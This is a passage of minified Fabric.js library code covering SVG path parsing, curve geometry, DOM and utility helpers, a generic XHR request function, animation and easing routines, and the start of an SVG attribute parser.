Z,He,Be,qe,R=0,J=h.length,ue=0,Ie=0,Ae=0,Ue=0,Xe=[],De=0;De<J;De++){switch(Be={x:ue,y:Ie,command:(Z=h[De])[0]},Z[0]){case"M":Be.length=0,Ae=ue=Z[1],Ue=Ie=Z[2];break;case"L":Be.length=x(ue,Ie,Z[1],Z[2]),ue=Z[1],Ie=Z[2];break;case"C":He=ee(ue,Ie,Z[1],Z[2],Z[3],Z[4],Z[5],Z[6]),qe=se(ue,Ie,Z[1],Z[2],Z[3],Z[4],Z[5],Z[6]),Be.iterator=He,Be.angleFinder=qe,Be.length=f(He,ue,Ie),ue=Z[5],Ie=Z[6];break;case"Q":He=z(ue,Ie,Z[1],Z[2],Z[3],Z[4]),qe=l(ue,Ie,Z[1],Z[2],Z[3],Z[4]),Be.iterator=He,Be.angleFinder=qe,Be.length=f(He,ue,Ie),ue=Z[3],Ie=Z[4];break;case"Z":case"z":Be.destX=Ae,Be.destY=Ue,Be.length=x(ue,Ie,Ae,Ue),ue=Ae,Ie=Ue}R+=Be.length,Xe.push(Be)}return Xe.push({length:R,x:ue,y:Ie}),Xe}j.util.joinPath=function(h){return h.map(function(R){return R.join(" ")}).join(" ")},j.util.parsePath=function G(h){var Z,ue,qe,De,Ve,R=[],J=[],Ie=j.rePathCommand,Ae="[-+]?(?:\\d*\\.\\d+|\\d+\\.?)(?:[eE][-+]?\\d+)?\\s*",Ue="("+Ae+")"+j.commaWsp,Xe="([01])"+j.commaWsp+"?",Be=new RegExp(Ue+"?"+Ue+"?"+Ue+Xe+Xe+Ue+"?("+Ae+")","g");if(!h||!h.match)return R;for(var me,ze=0,Ke=(Ve=h.match(/[mzlhvcsqta][^mzlhvcsqta]*/gi)).length;ze<Ke;ze++){De=(Z=Ve[ze]).slice(1).trim(),J.length=0;var rt=Z.charAt(0);if(me=[rt],"a"===rt.toLowerCase())for(var Ge;Ge=Be.exec(De);)for(var Qe=1;Qe<Ge.length;Qe++)J.push(Ge[Qe]);else for(;qe=Ie.exec(De);)J.push(qe[0]);Qe=0;for(var ht=J.length;Qe<ht;Qe++)ue=parseFloat(J[Qe]),isNaN(ue)||me.push(ue);var mt=g[rt.toLowerCase()],lt=b[rt]||rt;if(me.length-1>mt)for(var ft=1,xe=me.length;ft<xe;ft+=mt)R.push([rt].concat(me.slice(ft,ft+mt))),rt=lt;else R.push(me)}return R},j.util.makePathSimpler=function w(h){var Ae,Ue,Xe,Be,qe,De,R=0,J=0,Z=h.length,ue=0,Ie=0,He=[];for(Ue=0;Ue<Z;++Ue){switch(Xe=!1,(Ae=h[Ue].slice(0))[0]){case"l":Ae[0]="L",Ae[1]+=R,Ae[2]+=J;case"L":R=Ae[1],J=Ae[2];break;case"h":Ae[1]+=R;case"H":Ae[0]="L",Ae[2]=J,R=Ae[1];break;case"v":Ae[1]+=J;case"V":Ae[0]="L",J=Ae[1],Ae[1]=R,Ae[2]=J;break;case"m":Ae[0]="M",Ae[1]+=R,Ae[2]+=J;case"M":R=Ae[1],J=Ae[2],ue=Ae[1],Ie=Ae[2];break;case"c":Ae[0]="C",Ae[1]+=R,Ae[2]+=J,Ae[3]+=R,Ae[4]+=J,Ae[5]+=R,Ae[6]+=J;case"C":qe=Ae[3],De=Ae[4],R=Ae[5],J=Ae[6];break;case"s":Ae[0]="S",Ae[1]+=R,Ae[2]+=J,Ae[3]+=R,Ae[4]+=J;case"S":"C"===Be?(qe=2*R-qe,De=2*J-De):(qe=R,De=J),R=Ae[3],J=Ae[4],Ae[0]="C",Ae[5]=Ae[3],Ae[6]=Ae[4],Ae[3]=Ae[1],Ae[4]=Ae[2],Ae[1]=qe,Ae[2]=De,qe=Ae[3],De=Ae[4];break;case"q":Ae[0]="Q",Ae[1]+=R,Ae[2]+=J,Ae[3]+=R,Ae[4]+=J;case"Q":qe=Ae[1],De=Ae[2],R=Ae[3],J=Ae[4];break;case"t":Ae[0]="T",Ae[1]+=R,Ae[2]+=J;case"T":"Q"===Be?(qe=2*R-qe,De=2*J-De):(qe=R,De=J),Ae[0]="Q",R=Ae[1],J=Ae[2],Ae[1]=qe,Ae[2]=De,Ae[3]=R,Ae[4]=J;break;case"a":Ae[0]="A",Ae[6]+=R,Ae[7]+=J;case"A":Xe=!0,He=He.concat(D(R,J,Ae)),R=Ae[6],J=Ae[7];break;case"z":case"Z":R=ue,J=Ie}Xe||He.push(Ae),Be=Ae[0]}return He},j.util.getSmoothPathFromPoints=function X(h,R){var Z,J=[],ue=new j.Point(h[0].x,h[0].y),Ie=new j.Point(h[1].x,h[1].y),Ae=h.length,Ue=1,Xe=0,He=Ae>2;for(He&&(Ue=h[2].x<Ie.x?-1:h[2].x===Ie.x?0:1,Xe=h[2].y<Ie.y?-1:h[2].y===Ie.y?0:1),J.push(["M",ue.x-Ue*(R=R||0),ue.y-Xe*R]),Z=1;Z<Ae;Z++){if(!ue.eq(Ie)){var Be=ue.midPointFrom(Ie);J.push(["Q",ue.x,ue.y,Be.x,Be.y])}ue=h[Z],Z+1<h.length&&(Ie=h[Z+1])}return He&&(Ue=ue.x>h[Z-2].x?1:ue.x===h[Z-2].x?0:-1,Xe=ue.y>h[Z-2].y?1:ue.y===h[Z-2].y?0:-1),J.push(["L",ue.x+Ue*R,ue.y+Xe*R]),J},j.util.getPathSegmentsInfo=v,j.util.getBoundsOfCurve=function p(h,R,J,Z,ue,Ie,Ae,Ue){var Xe;if(j.cachesBoundsOfCurve&&(Xe=E.call(arguments),j.boundsOfCurveCache[Xe]))return j.boundsOfCurveCache[Xe];var me,Ke,rt,Ge,Qe,ht,mt,lt,He=Math.sqrt,Be=Math.min,qe=Math.max,De=Math.abs,Ve=[],ze=[[],[]];Ke=6*h-12*J+6*ue,me=-3*h+9*J-9*ue+3*Ae,rt=3*J-3*h;for(var ft=0;ft<2;++ft)if(ft>0&&(Ke=6*R-12*Z+6*Ie,me=-3*R+9*Z-9*Ie+3*Ue,rt=3*Z-3*R),De(me)<1e-12){if(De(Ke)<1e-12)continue;0<(Ge=-rt/Ke)&&Ge<1&&Ve.push(Ge)}else!((mt=Ke*Ke-4*rt*me)<0)&&(0<(Qe=(-Ke+(lt=He(mt)))/(2*me))&&Qe<1&&Ve.push(Qe),0<(ht=(-Ke-lt)/(2*me))&&ht<1&&Ve.push(ht));for(var Te,Je=Ve.length,Oe=Je;Je--;)ze[0][Je]=(Te=1-(Ge=Ve[Je]))*Te*Te*h+3*Te*Te*Ge*J+3*Te*Ge*Ge*ue+Ge*Ge*Ge*Ae,ze[1][Je]=Te*Te*Te*R+3*Te*Te*Ge*Z+3*Te*Ge*Ge*Ie+Ge*Ge*Ge*Ue;ze[0][Oe]=h,ze[1][Oe]=R,ze[0][Oe+1]=Ae,ze[1][Oe+1]=Ue;var Le=[{x:Be.apply(null,ze[0]),y:Be.apply(null,ze[1])},{x:qe.apply(null,ze[0]),y:qe.apply(null,ze[1])}];return j.cachesBoundsOfCurve&&(j.boundsOfCurveCache[Xe]=Le),Le},j.util.getPointOnPath=function P(h,R,J){J||(J=v(h));for(var Z=0;R-J[Z].length>0&&Z<J.length-2;)R-=J[Z].length,Z++;var Xe,ue=J[Z],Ie=R/ue.length,Ue=h[Z];switch(ue.command){case"M":return{x:ue.x,y:ue.y,angle:0};case"Z":case"z":return(Xe=new j.Point(ue.x,ue.y).lerp(new j.Point(ue.destX,ue.destY),Ie)).angle=Math.atan2(ue.destY-ue.y,ue.destX-ue.x),Xe;case"L":return(Xe=new j.Point(ue.x,ue.y).lerp(new j.Point(Ue[1],Ue[2]),Ie)).angle=Math.atan2(Ue[2]-ue.y,Ue[1]-ue.x),Xe;case"C":case"Q":return function A(h,R){for(var Ae,Ue,Be,J=0,Z=0,ue=h.iterator,Ie={x:h.x,y:h.y},Xe=.01,He=h.angleFinder;Z<R&&Xe>1e-4;)Ae=ue(J),Be=J,(Ue=x(Ie.x,Ie.y,Ae.x,Ae.y))+Z>R?(J-=Xe,Xe/=2):(Ie=Ae,J+=Xe,Z+=Ue);return Ae.angle=He(Be),Ae}(ue,R)}},j.util.transformPath=function L(h,R,J){return J&&(R=j.util.multiplyTransformMatrices(R,[1,0,0,1,-J.x,-J.y])),h.map(function(Z){for(var ue=Z.slice(0),Ie={},Ae=1;Ae<Z.length-1;Ae+=2)Ie.x=Z[Ae],Ie.y=Z[Ae+1],Ie=j.util.transformPoint(Ie,R),ue[Ae]=Ie.x,ue[Ae+1]=Ie.y;return ue})}}(),function(){var E=Array.prototype.slice;function M(p,D,w){if(p&&0!==p.length){var x=p.length-1,S=D?p[x][D]:p[x];if(D)for(;x--;)w(p[x][D],S)&&(S=p[x][D]);else for(;x--;)w(p[x],S)&&(S=p[x]);return S}}j.util.array={fill:function y(p,D){for(var w=p.length;w--;)p[w]=D;return p},invoke:function g(p,D){for(var w=E.call(arguments,2),x=[],S=0,O=p.length;S<O;S++)x[S]=w.length?p[S][D].apply(p[S],w):p[S][D].call(p[S]);return x},min:function _(p,D){return M(p,D,function(w,x){return w<x})},max:function b(p,D){return M(p,D,function(w,x){return w>=x})}}}(),function(){function E(b,_,y){if(y)if(!j.isLikelyNode&&_ instanceof Element)b=_;else if(_ instanceof Array){b=[];for(var M=0,p=_.length;M<p;M++)b[M]=E({},_[M],y)}else if(_&&"object"==typeof _)for(var D in _)"canvas"===D||"group"===D?b[D]=null:_.hasOwnProperty(D)&&(b[D]=E({},_[D],y));else b=_;else for(var D in _)b[D]=_[D];return b}j.util.object={extend:E,clone:function g(b,_){return E({},b,_)}},j.util.object.extend(j.util,j.Observable)}(),function(){function y(M,p){var D=M.charCodeAt(p);if(isNaN(D))return"";if(D<55296||D>57343)return M.charAt(p);if(55296<=D&&D<=56319){if(M.length<=p+1)throw"High surrogate without following low surrogate";var w=M.charCodeAt(p+1);if(56320>w||w>57343)throw"High surrogate without following low surrogate";return M.charAt(p)+M.charAt(p+1)}if(0===p)throw"Low surrogate without preceding high surrogate";var x=M.charCodeAt(p-1);if(55296>x||x>56319)throw"Low surrogate without preceding high surrogate";return!1}j.util.string={camelize:function E(M){return M.replace(/-+(.)?/g,function(p,D){return D?D.toUpperCase():""})},capitalize:function g(M,p){return M.charAt(0).toUpperCase()+(p?M.slice(1):M.slice(1).toLowerCase())},escapeXml:function b(M){return M.replace(/&/g,"&amp;").replace(/"/g,"&quot;").replace(/'/g,"&apos;").replace(/</g,"&lt;").replace(/>/g,"&gt;")},graphemeSplit:function _(M){var D,p=0,w=[];for(p=0;p<M.length;p++)!1!==(D=y(M,p))&&w.push(D);return w}}}(),function(){var E=Array.prototype.slice,g=function(){},b=function(){for(var D in{toString:1})if("toString"===D)return!1;return!0}(),_=function(D,w,x){for(var S in w)D.prototype[S]=S in D.prototype&&"function"==typeof D.prototype[S]&&(w[S]+"").indexOf("callSuper")>-1?function(O){return function(){var U=this.constructor.superclass;this.constructor.superclass=x;var K=w[O].apply(this,arguments);if(this.constructor.superclass=U,"initialize"!==O)return K}}(S):w[S],b&&(w.toString!==Object.prototype.toString&&(D.prototype.toString=w.toString),w.valueOf!==Object.prototype.valueOf&&(D.prototype.valueOf=w.valueOf))};function y(){}function M(D){for(var w=null,x=this;x.constructor.superclass;){var S=x.constructor.superclass.prototype[D];if(x[D]!==S){w=S;break}x=x.constructor.superclass.prototype}return w?arguments.length>1?w.apply(this,E.call(arguments,1)):w.call(this):console.log("tried to callSuper "+D+", method not found in prototype chain",this)}j.util.createClass=function p(){var D=null,w=E.call(arguments,0);function x(){this.initialize.apply(this,arguments)}"function"==typeof w[0]&&(D=w.shift()),x.superclass=D,x.subclasses=[],D&&(y.prototype=D.prototype,x.prototype=new y,D.subclasses.push(x));for(var S=0,O=w.length;S<O;S++)_(x,w[S],D);return x.prototype.initialize||(x.prototype.initialize=g),x.prototype.constructor=x,x.prototype.callSuper=M,x}}(),function(){var E=!!j.document.createElement("div").attachEvent,g=["touchstart","touchmove","touchend"];j.util.addListener=function(_,y,M,p){_&&_.addEventListener(y,M,!E&&p)},j.util.removeListener=function(_,y,M,p){_&&_.removeEventListener(y,M,!E&&p)},j.util.getPointer=function(_){var M=j.util.getScrollLeftTop(_.target),p=function b(_){var y=_.changedTouches;return y&&y[0]?y[0]:_}(_);return{x:p.clientX+M.left,y:p.clientY+M.top}},j.util.isTouchEvent=function(_){return g.indexOf(_.type)>-1||"touch"===_.pointerType}}(),function(){var g=j.document.createElement("div"),y=/alpha\s*\(\s*opacity\s*=\s*([^\)]+)\)/,M=function(p){return p};"string"==typeof g.style.opacity?M=function(p,D){return p.style.opacity=D,p}:"string"==typeof g.style.filter&&(M=function(p,D){var w=p.style;return p.currentStyle&&!p.currentStyle.hasLayout&&(w.zoom=1),y.test(w.filter)?w.filter=w.filter.replace(y,D=D>=.9999?"":"alpha(opacity="+100*D+")"):w.filter+=" alpha(opacity="+100*D+")",p}),j.util.setStyle=function E(p,D){var w=p.style;if(!w)return p;if("string"==typeof D)return p.style.cssText+=";"+D,D.indexOf("opacity")>-1?M(p,D.match(/opacity:\s*(\d?\.?\d*)/)[1]):p;for(var x in D)"opacity"===x?M(p,D[x]):w.setProperty("float"===x||"cssFloat"===x?void 0===w.styleFloat?"cssFloat":"styleFloat":x,D[x]);return p}}(),function(){var b,x,K,ee,E=Array.prototype.slice,_=function(K){return E.call(K,0)};try{b=_(j.document.childNodes)instanceof Array}catch(K){}function y(K,ee){var se=j.document.createElement(K);for(var ve in ee)"class"===ve?se.className=ee[ve]:"for"===ve?se.htmlFor=ee[ve]:se.setAttribute(ve,ee[ve]);return se}function D(K){for(var ee=0,se=0,ve=j.document.documentElement,le=j.document.body||{scrollLeft:0,scrollTop:0};K&&(K.parentNode||K.host)&&((K=K.parentNode||K.host)===j.document?(ee=le.scrollLeft||ve.scrollLeft||0,se=le.scrollTop||ve.scrollTop||0):(ee+=K.scrollLeft||0,se+=K.scrollTop||0),1!==K.nodeType||"fixed"!==K.style.position););return{left:ee,top:se}}b||(_=function(K){for(var ee=new Array(K.length),se=K.length;se--;)ee[se]=K[se];return ee}),x=j.document.defaultView&&j.document.defaultView.getComputedStyle?function(K,ee){var se=j.document.defaultView.getComputedStyle(K,null);return se?se[ee]:void 0}:function(K,ee){var se=K.style[ee];return!se&&K.currentStyle&&(se=K.currentStyle[ee]),se},ee="userSelect"in(K=j.document.documentElement.style)?"userSelect":"MozUserSelect"in K?"MozUserSelect":"WebkitUserSelect"in K?"WebkitUserSelect":"KhtmlUserSelect"in K?"KhtmlUserSelect":"",j.util.makeElementUnselectable=function se(le){return void 0!==le.onselectstart&&(le.onselectstart=j.util.falseFunction),ee?le.style[ee]="none":"string"==typeof le.unselectable&&(le.unselectable="on"),le},j.util.makeElementSelectable=function ve(le){return void 0!==le.onselectstart&&(le.onselectstart=null),ee?le.style[ee]="":"string"==typeof le.unselectable&&(le.unselectable=""),le},j.util.setImageSmoothing=function U(K,ee){K.imageSmoothingEnabled=K.imageSmoothingEnabled||K.webkitImageSmoothingEnabled||K.mozImageSmoothingEnabled||K.msImageSmoothingEnabled||K.oImageSmoothingEnabled,K.imageSmoothingEnabled=ee},j.util.getById=function g(K){return"string"==typeof K?j.document.getElementById(K):K},j.util.toArray=_,j.util.addClass=function M(K,ee){K&&-1===(" "+K.className+" ").indexOf(" "+ee+" ")&&(K.className+=(K.className?" ":"")+ee)},j.util.makeElement=y,j.util.wrapElement=function p(K,ee,se){return"string"==typeof ee&&(ee=y(ee,se)),K.parentNode&&K.parentNode.replaceChild(ee,K),ee.appendChild(K),ee},j.util.getScrollLeftTop=D,j.util.getElementOffset=function w(K){var ee,ye,se=K&&K.ownerDocument,ve={left:0,top:0},le={left:0,top:0},z={borderLeftWidth:"left",borderTopWidth:"top",paddingLeft:"left",paddingTop:"top"};if(!se)return le;for(var l in z)le[z[l]]+=parseInt(x(K,l),10)||0;return ee=se.documentElement,void 0!==K.getBoundingClientRect&&(ve=K.getBoundingClientRect()),ye=D(K),{left:ve.left+ye.left-(ee.clientLeft||0)+le.left,top:ve.top+ye.top-(ee.clientTop||0)+le.top}},j.util.getNodeCanvas=function S(K){var ee=j.jsdomImplForWrapper(K);return ee._canvas||ee._image},j.util.cleanUpJsdomNode=function O(K){if(j.isLikelyNode){var ee=j.jsdomImplForWrapper(K);ee&&(ee._image=null,ee._canvas=null,ee._currentSrc=null,ee._attributes=null,ee._classList=null)}}}(),function(){function g(){}j.util.request=function b(_,y){y||(y={});var M=y.method?y.method.toUpperCase():"GET",p=y.onComplete||function(){},D=new j.window.XMLHttpRequest,w=y.body||y.parameters;return D.onreadystatechange=function(){4===D.readyState&&(p(D),D.onreadystatechange=g)},"GET"===M&&(w=null,"string"==typeof y.parameters&&(_=function E(_,y){return _+(/\?/.test(_)?"&":"?")+y}(_,y.parameters))),D.open(M,_,!0),("POST"===M||"PUT"===M)&&D.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),D.send(w),D}}(),j.log=console.log,j.warn=console.warn,function(){var E=j.util.object.extend,g=j.util.object.clone,b=[];function _(){return!1}function y(S,O,U,K){return-U*Math.cos(S/K*(Math.PI/2))+U+O}j.util.object.extend(b,{cancelAll:function(){var S=this.splice(0);return S.forEach(function(O){O.cancel()}),S},cancelByCanvas:function(S){if(!S)return[];var O=this.filter(function(U){return"object"==typeof U.target&&U.target.canvas===S});return O.forEach(function(U){U.cancel()}),O},cancelByTarget:function(S){var O=this.findAnimationsByTarget(S);return O.forEach(function(U){U.cancel()}),O},findAnimationIndex:function(S){return this.indexOf(this.findAnimation(S))},findAnimation:function(S){return this.find(function(O){return O.cancel===S})},findAnimationsByTarget:function(S){return S?this.filter(function(O){return O.target===S}):[]}});var p=j.window.requestAnimationFrame||j.window.webkitRequestAnimationFrame||j.window.mozRequestAnimationFrame||j.window.oRequestAnimationFrame||j.window.msRequestAnimationFrame||function(S){return j.window.setTimeout(S,1e3/60)},D=j.window.cancelAnimationFrame||j.window.clearTimeout;function w(){return p.apply(j.window,arguments)}j.util.animate=function M(S){S||(S={});var U,O=!1,K=function(){var ee=j.runningAnimations.indexOf(U);return ee>-1&&j.runningAnimations.splice(ee,1)[0]};return U=E(g(S),{cancel:function(){return O=!0,K()},currentValue:"startValue"in S?S.startValue:0,completionRate:0,durationRate:0}),j.runningAnimations.push(U),w(function(ee){var ye,se=ee||+new Date,ve=S.duration||500,le=se+ve,z=S.onChange||_,l=S.abort||_,f=S.onComplete||_,A=S.easing||y,v="startValue"in S&&S.startValue.length>0,P="startValue"in S?S.startValue:0,G="endValue"in S?S.endValue:100,X=S.byValue||(v?P.map(function(L,h){return G[h]-P[h]}):G-P);S.onStart&&S.onStart(),function L(h){var R=(ye=h||+new Date)>le?ve:ye-se,J=R/ve,Z=v?P.map(function(Ie,Ae){return A(R,P[Ae],X[Ae],ve)}):A(R,P,X,ve),ue=Math.abs(v?(Z[0]-P[0])/X[0]:(Z-P)/X);if(U.currentValue=v?Z.slice():Z,U.completionRate=ue,U.durationRate=J,!O){if(l(Z,ue,J))return void K();if(ye>le)return U.currentValue=v?G.slice():G,U.completionRate=1,U.durationRate=1,z(v?G.slice():G,1,1),f(G,1,1),void K();z(Z,ue,J),w(L)}}(se)}),U.cancel},j.util.requestAnimFrame=w,j.util.cancelAnimFrame=function x(){return D.apply(j.window,arguments)},j.runningAnimations=b}(),function(){function E(b,_,y){var M="rgba("+parseInt(b[0]+y*(_[0]-b[0]),10)+","+parseInt(b[1]+y*(_[1]-b[1]),10)+","+parseInt(b[2]+y*(_[2]-b[2]),10);return(M+=","+(b&&_?parseFloat(b[3]+y*(_[3]-b[3])):1))+")"}j.util.animateColor=function g(b,_,y,M){var p=new j.Color(b).getSource(),D=new j.Color(_).getSource(),w=M.onComplete,x=M.onChange;return j.util.animate(j.util.object.extend(M=M||{},{duration:y||500,startValue:p,endValue:D,byValue:D,easing:function(S,O,U,K){return E(O,U,M.colorEasing?M.colorEasing(S,K):1-Math.cos(S/K*(Math.PI/2)))},onComplete:function(S,O,U){if(w)return w(E(D,D,0),O,U)},onChange:function(S,O,U){if(x){if(Array.isArray(S))return x(E(S,S,0),O,U);x(S,O,U)}}}))}}(),function(){function E(h,R,J,Z){return h<Math.abs(R)?(h=R,Z=J/4):Z=0===R&&0===h?J/(2*Math.PI)*Math.asin(1):J/(2*Math.PI)*Math.asin(R/h),{a:h,c:R,p:J,s:Z}}function g(h,R,J){return h.a*Math.pow(2,10*(R-=1))*Math.sin((R*J-h.s)*(2*Math.PI)/h.p)}function G(h,R,J,Z){return J-X(Z-h,0,J,Z)+R}function X(h,R,J,Z){return(h/=Z)<1/2.75?J*(7.5625*h*h)+R:h<2/2.75?J*(7.5625*(h-=1.5/2.75)*h+.75)+R:h<2.5/2.75?J*(7.5625*(h-=2.25/2.75)*h+.9375)+R:J*(7.5625*(h-=2.625/2.75)*h+.984375)+R}j.util.ease={easeInQuad:function(h,R,J,Z){return J*(h/=Z)*h+R},easeOutQuad:function(h,R,J,Z){return-J*(h/=Z)*(h-2)+R},easeInOutQuad:function(h,R,J,Z){return(h/=Z/2)<1?J/2*h*h+R:-J/2*(--h*(h-2)-1)+R},easeInCubic:function(h,R,J,Z){return J*(h/=Z)*h*h+R},easeOutCubic:function b(h,R,J,Z){return J*((h=h/Z-1)*h*h+1)+R},easeInOutCubic:function _(h,R,J,Z){return(h/=Z/2)<1?J/2*h*h*h+R:J/2*((h-=2)*h*h+2)+R},easeInQuart:function y(h,R,J,Z){return J*(h/=Z)*h*h*h+R},easeOutQuart:function M(h,R,J,Z){return-J*((h=h/Z-1)*h*h*h-1)+R},easeInOutQuart:function p(h,R,J,Z){return(h/=Z/2)<1?J/2*h*h*h*h+R:-J/2*((h-=2)*h*h*h-2)+R},easeInQuint:function D(h,R,J,Z){return J*(h/=Z)*h*h*h*h+R},easeOutQuint:function w(h,R,J,Z){return J*((h=h/Z-1)*h*h*h*h+1)+R},easeInOutQuint:function x(h,R,J,Z){return(h/=Z/2)<1?J/2*h*h*h*h*h+R:J/2*((h-=2)*h*h*h*h+2)+R},easeInSine:function S(h,R,J,Z){return-J*Math.cos(h/Z*(Math.PI/2))+J+R},easeOutSine:function O(h,R,J,Z){return J*Math.sin(h/Z*(Math.PI/2))+R},easeInOutSine:function U(h,R,J,Z){return-J/2*(Math.cos(Math.PI*h/Z)-1)+R},easeInExpo:function K(h,R,J,Z){return 0===h?R:J*Math.pow(2,10*(h/Z-1))+R},easeOutExpo:function ee(h,R,J,Z){return h===Z?R+J:J*(1-Math.pow(2,-10*h/Z))+R},easeInOutExpo:function se(h,R,J,Z){return 0===h?R:h===Z?R+J:(h/=Z/2)<1?J/2*Math.pow(2,10*(h-1))+R:J/2*(2-Math.pow(2,-10*--h))+R},easeInCirc:function ve(h,R,J,Z){return-J*(Math.sqrt(1-(h/=Z)*h)-1)+R},easeOutCirc:function le(h,R,J,Z){return J*Math.sqrt(1-(h=h/Z-1)*h)+R},easeInOutCirc:function ye(h,R,J,Z){return(h/=Z/2)<1?-J/2*(Math.sqrt(1-h*h)-1)+R:J/2*(Math.sqrt(1-(h-=2)*h)+1)+R},easeInElastic:function z(h,R,J,Z){var Ie=0;return 0===h?R:1==(h/=Z)?R+J:(Ie||(Ie=.3*Z),-g(E(J,J,Ie,1.70158),h,Z)+R)},easeOutElastic:function l(h,R,J,Z){var Ie=0;if(0===h)return R;if(1==(h/=Z))return R+J;Ie||(Ie=.3*Z);var Ue=E(J,J,Ie,1.70158);return Ue.a*Math.pow(2,-10*h)*Math.sin((h*Z-Ue.s)*(2*Math.PI)/Ue.p)+Ue.c+R},easeInOutElastic:function f(h,R,J,Z){var Ie=0;if(0===h)return R;if(2==(h/=Z/2))return R+J;Ie||(Ie=Z*(.3*1.5));var Ue=E(J,J,Ie,1.70158);return h<1?-.5*g(Ue,h,Z)+R:Ue.a*Math.pow(2,-10*(h-=1))*Math.sin((h*Z-Ue.s)*(2*Math.PI)/Ue.p)*.5+Ue.c+R},easeInBack:function A(h,R,J,Z,ue){return void 0===ue&&(ue=1.70158),J*(h/=Z)*h*((ue+1)*h-ue)+R},easeOutBack:function v(h,R,J,Z,ue){return void 0===ue&&(ue=1.70158),J*((h=h/Z-1)*h*((ue+1)*h+ue)+1)+R},easeInOutBack:function P(h,R,J,Z,ue){return void 0===ue&&(ue=1.70158),(h/=Z/2)<1?J/2*(h*h*((1+(ue*=1.525))*h-ue))+R:J/2*((h-=2)*h*((1+(ue*=1.525))*h+ue)+2)+R},easeInBounce:G,easeOutBounce:X,easeInOutBounce:function L(h,R,J,Z){return h<Z/2?.5*G(2*h,0,J,Z)+R:.5*X(2*h-Z,0,J,Z)+.5*J+R}}}(),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.util.object.clone,y=g.util.toFixed,M=g.util.parseUnit,p=g.util.multiplyTransformMatrices,O={cx:"left",x:"left",r:"radius",cy:"top",y:"top",display:"visible",visibility:"visible",transform:"transformMatrix","fill-opacity":"fillOpacity","fill-rule":"fillRule","font-family":"fontFamily","font-size":"fontSize","font-style":"fontStyle","font-weight":"fontWeight","letter-spacing":"charSpacing","paint-order":"paintFirst","stroke-dasharray":"strokeDashArray","stroke-dashoffset":"strokeDashOffset","stroke-linecap":"strokeLineCap","stroke-linejoin":"strokeLineJoin","stroke-miterlimit":"strokeMiterLimit","stroke-opacity":"strokeOpacity","stroke-width":"strokeWidth","text-decoration":"textDecoration","text-anchor":"textAnchor",opacity:"opacity","clip-path":"clipPath","clip-rule":"clipRule","vector-effect":"strokeUniform","image-rendering":"imageSmoothing"},U={stroke:"strokeOpacity",fill:"fillOpacity"},K="font-size",ee="clip-path";function se(Ie){return Ie in O?O[Ie]:Ie}function ve(Ie,Ae,Ue,Xe){var Be,He=Array.isArray(Ae);if("fill"!==Ie&&"stroke"!==Ie||"none"!==Ae){if("strokeUniform"===Ie)return"non-scaling-stroke"===Ae;if("strokeDashArray"===Ie)Ae="none"===Ae?null:Ae.replace(/,/g," ").split(/\s+/).map(parseFloat);else if("transformMatrix"===Ie)Ae=Ue&&Ue.transformMatrix?p(Ue.transformMatrix,g.parseTransformAttribute(Ae)):g.parseTransformAttribute(Ae);else if("visible"===Ie)Ae="none"!==Ae&&"hidden"!==Ae,Ue&&!1===Ue.visible&&(Ae=!1);else if("opacity"===Ie)Ae=parseFloat(Ae),Ue&&void 0!==Ue.opacity&&(Ae*=Ue.opacity);else if("textAnchor"===Ie)Ae="start"===Ae?"left":"end"===Ae?"right":"center";else if("charSpacing"===Ie)Be=M(Ae,Xe)/Xe*1e3;else if("paintFirst"===Ie){var qe=Ae.indexOf("fill"),De=Ae.indexOf("stroke");Ae="fill",(qe>-1&&De>-1&&De<qe||-1===qe&&De>-1)&&(Ae="stroke")}else{if("href"===Ie||"xlink:href"===Ie||"font"===Ie)return Ae;if("imageSmoothing"===Ie)return"optimizeQuality"===Ae;Be=He?Ae.map(M):M(Ae,Xe)}}else Ae="";return!He&&isNaN(Be)?Ae:Be}function le(Ie){return new RegExp("^("+Ie.join("|")+")\\b","i")}function z(Ie,Ae){var He,Be,qe,Xe=[];for(Be=0,qe=Ae.length;Be<qe;Be++)He=Ie.getElementsByTagName(Ae[Be]),Xe=Xe.concat(Array.prototype.slice.call(He));return Xe}function v(Ie,Ae){var Ue,Xe=!0;return(Ue=G(Ie,Ae.pop()))&&Ae.length&&(Xe=function P(Ie,Ae){for(var Ue,Xe=!0;Ie.parentNode&&1===Ie.parentNode.nodeType&&Ae.length;)Xe&&(Ue=Ae.pop()),Xe=G(Ie=Ie.parentNode,Ue);return 0===Ae.length}(Ie,Ae)),Ue&&Xe&&0===Ae.length}function G(Ie,Ae){var Be,qe,Ue=Ie.nodeName,Xe=Ie.getAttribute("class"),He=Ie.getAttribute("id");if(Be=new RegExp("^"+Ue,"i"),Ae=Ae.replace(Be,""),He&&Ae.length&&(Be=new RegExp("#"+He+"(?![a-zA-Z\\-]+)","i"),Ae=Ae.replace(Be,"")),Xe&&Ae.length)for(qe=(Xe=Xe.split(" ")).length;qe--;)Be=new RegExp("\\."+Xe[qe]+"(?![a-zA-Z\\-]+)","i"),Ae=Ae.replace(Be,"");return 0===Ae.length}function X(Ie,Ae){var Ue;if(Ie.getElementById&&(Ue=Ie.getElementById(Ae)),Ue)return Ue;var Xe,He,Be,qe=Ie.getElementsByTagName("*");for(He=0,Be=qe.length;He<Be;He++)if(Ae===(Xe=qe[He]).getAttribute("id"))return Xe}g.svgValidTagNamesRegEx=le(["path","circle","polygon","polyline","ellipse","rect","line","image","text"]),g.svgViewBoxElementsRegEx=le(["symbol","image","marker","pattern","view","svg"]),g.svgInvalidAncestorsRegEx=le(["pattern","defs","symbol","metadata","clipPath","mask","desc"]),g.svgValidParentsRegEx=le(["symbol","g","a","svg","clipPath","defs"]),g.cssRules={},g.gradientDefs={},g.clipPaths={},g.parseTransformAttribute=function(){function Ue(ft,xe,We){ft[We]=Math.tan(g.util.degreesToRadians(xe[0]))}var He=g.iMatrix,Be=g.reNum,qe=g.commaWsp,Ge="(?:(?:(matrix)\\s*\\(\\s*("+Be+")"+qe+"("+Be+")"+qe+"("+Be+")"+qe+"("+Be+")"+qe+"("+Be+")"+qe+"("+Be+")\\s*\\))|(?:(translate)\\s*\\(\\s*("+Be+")(?:"+qe+"("+Be+"))?\\s*\\))|(?:(scale)\\s*\\(\\s*("+Be+")(?:"+qe+"("+Be+"))?\\s*\\))|(?:(rotate)\\s*\\(\\s*("+Be+")(?:"+qe+"("+Be+")"+qe+"("+Be+"))?\\s*\\))|(?:(skewX)\\s*\\(\\s*("+Be+")\\s*\\))|(?:(skewY)\\s*\\(\\s*("+Be+")\\s*\\)))",mt=new 